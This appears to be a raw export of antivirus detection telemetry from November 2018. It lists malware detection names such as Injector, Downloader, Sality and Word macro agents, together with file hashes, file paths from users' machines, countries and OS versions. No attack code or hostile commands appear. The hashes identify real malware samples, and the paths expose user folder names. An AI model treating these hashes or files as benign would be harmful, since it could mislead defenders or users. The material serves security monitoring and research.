  Row(detection=Row(filename='graphs.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\GRAPHS\\GRAPHS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='549a129edf8e1b2dcf657cd8495702ce9fee17d4bbd13188a4f5928b5cc34f30', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122321-7ce59707', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122321-7CE59707', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061345-6d08f645', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061345-6D08F645', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054013-bd75985e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054013-BD75985E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061610-c359b2d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061610-C359B2D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:16:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051354-100eb309', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051354-100EB309', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052739-fc0c19e8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052739-FC0C19E8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052812-0fc4f4c0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052812-0FC4F4C0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:28:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060323-fa2118ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060323-FA2118AE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050404-b0ecd197', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050404-B0ECD197', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:04:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055509-d375b2bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055509-D375B2BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060555-54c3e628', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060555-54C3E628', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:05:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052947-48427853', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052947-48427853', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055558-f0ab9bcd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055558-F0AB9BCD', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051305-f360f2aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051305-F360F2AA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050904-635a2f3a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050904-635A2F3A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060013-88eb6738', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060013-88EB6738', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:00:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060341-04e8c156', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060341-04E8C156', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050957-82d76545', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050957-82D76545', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:09:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060439-276e7624', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060439-276E7624', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055552-ed3b6d19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055552-ED3B6D19', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:55:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052135-22ef0ee5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052135-22EF0EE5', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:21:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060802-a04e25ed', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060802-A04E25ED', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061201-2eb413a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061201-2EB413A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061057-086a640c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061057-086A640C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:10:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060851-bda5422f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060851-BDA5422F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:08:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055615-fae622c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055615-FAE622C7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:56:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061505-9c402ae8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061505-9C402AE8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060957-e4c85a33', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060957-E4C85A33', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055103-4109cef2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055103-4109CEF2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052520-a97e2e01', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052520-A97E2E01', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053456-00d707cb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053456-00D707CB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052035-ff43ed58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052035-FF43ED58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:20:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053303-bd30993a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053303-BD30993A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054339-388e6263', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054339-388E6263', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:43:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053724-58d700bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053724-58D700BC', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:37:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051238-e300039b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051238-E300039B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:12:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050817-4760eb8c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050817-4760EB8C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062033-601676fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062033-601676FA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:20:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060915-cc1b232b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060915-CC1B232B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:09:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050513-d9d4470f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050513-D9D4470F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered tisir', filepath='C:\\WINDOWS\\System32\\Tasks\\Yahoo! Powered tisir', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='8526df54488745e1e85c05d2a04cd546df21d06ba727eeae68b84f25a5b2cf6b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T13:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051706-82a11651', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051706-82A11651', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:17:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062228-a45c2f04', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062228-A45C2F04', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062222-a0f8b70b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062222-A0F8B70B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T05:30:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054851-f23a645f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054851-F23A645F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:48:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='skins.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\GTA 2010الجديده\\SKINS\\SKINS.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='79b8a0226397de22cf3c724a5eef818a7c5e675b9543dfe4c152b806144d6088', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052516-a6d5fac1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052516-A6D5FAC1', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050803-3f077d1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050803-3F077D1B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\aswidsagent.exe', parentsize=6800144, timestamp='2018-11-01T15:08:30Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='- copy.bat', filepath='D:\\DATA_SHARE\\file FD Kantor\\agustus - Copy\\- Copy.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:36Z'), dt=datetime.date(2018, 11, 1)),
